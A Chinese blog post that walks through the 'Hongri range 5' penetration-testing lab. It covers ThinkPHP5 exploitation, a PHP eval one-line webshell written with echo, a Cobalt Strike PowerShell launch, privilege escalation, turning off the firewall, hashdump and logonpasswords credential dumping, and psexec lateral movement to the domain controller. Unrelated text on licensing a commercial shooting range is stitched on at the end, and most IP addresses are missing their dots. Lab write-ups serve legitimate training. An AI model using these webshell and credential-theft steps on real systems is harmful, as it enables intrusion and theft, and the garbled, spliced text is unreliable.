红日靶场5

红日靶场5,第1张

网络环境

kali攻击机:

ip为1921681128

靶机win7:

本地管理员用户leo\123com

域管sun\Administrator dc123com 改为 20121225Qnmxa@

ip为1921681136和192168138138

靶机win2008:

账号sun\admin 2020com改为20121225Qnmxa@

ip为192168138138

在win7上打开phpstudy,打开web环境

复现

使用arp-scan -l扫描内网存活主机

找到目标靶机为1921681136

使用nmap进行扫描

nmap 1921681136 -T4 -A -sV

发现了80端口,先访问下

发现为TP5,直接用工具打

可以执行命令,直接写入一句话木马

echo <php @eval($_POST['cmd'])> > shellphp

直接用蚁剑连接,然后对目标进行信息搜集

发现有两个网段,一个是1段,另一个是138段,并且在域suncom中,DNS服务器为192168138138,基本上DNS服务器就是域控

话不多说,直接上CS,直接通过powershell命令上线

设置心跳时间为1秒:sleep 1

然后使用插件直接一键提权,比如梼杌、谢公子插件等,拿到一个system权限的会话

打开system权限的会话,查看防火墙情况

shell netsh firewall show state

是关着的,我手动把它关了

查看域内计算机列表:net view

返现主机DC和WIN7

查看域控列表:net dclist

查看本机用户列表

有3个用户

接下来抓hash:hashdump

抓密码:logonpassword

然后通过“视图”-“密码凭证”查看抓到的密码

点击“视图”-“目标列表”

直接使用psexec配合SMB监听器上线DC机器

拿到了DC的beacon

1 射击场设计图纸2 营业执照3 法人资格证明材料4 管理方案、预案5 安全管理制度6 场地使用证明材料7 立项申请审批表。
申请单位将申请材料报当地公安机关审查,并报市公安局批准。申请材料包括:
(一)填写《商业(彩dq)射击场批准登记表》;
(二)射击场的四张相邻地图和平面图;
(三)申请单位q支管理制度和书面要求;
(四)子d库的结构和说明;
(五)子d头管理人员培训证书和非犯罪证明;
(六)与当地公安机关签订子d安全管理责任;
(七)县级以上公安机关的申请文件;
《中华人民共和国q支管理法》 第六条 经省级人民政府体育行政主管部门批准专门从事射击竞技体育运动的单位、经省级人民政府公安机关批准的营业性射击场,可以配置射击运动q支。


欢迎分享,转载请注明来源:内存溢出

原文地址: http://outofmemory.cn/zz/10900775.html

(0)
打赏 微信扫一扫 微信扫一扫 支付宝扫一扫 支付宝扫一扫
上一篇 2023-05-12
下一篇 2023-05-12

发表评论

登录后才能评论

评论列表(0条)

保存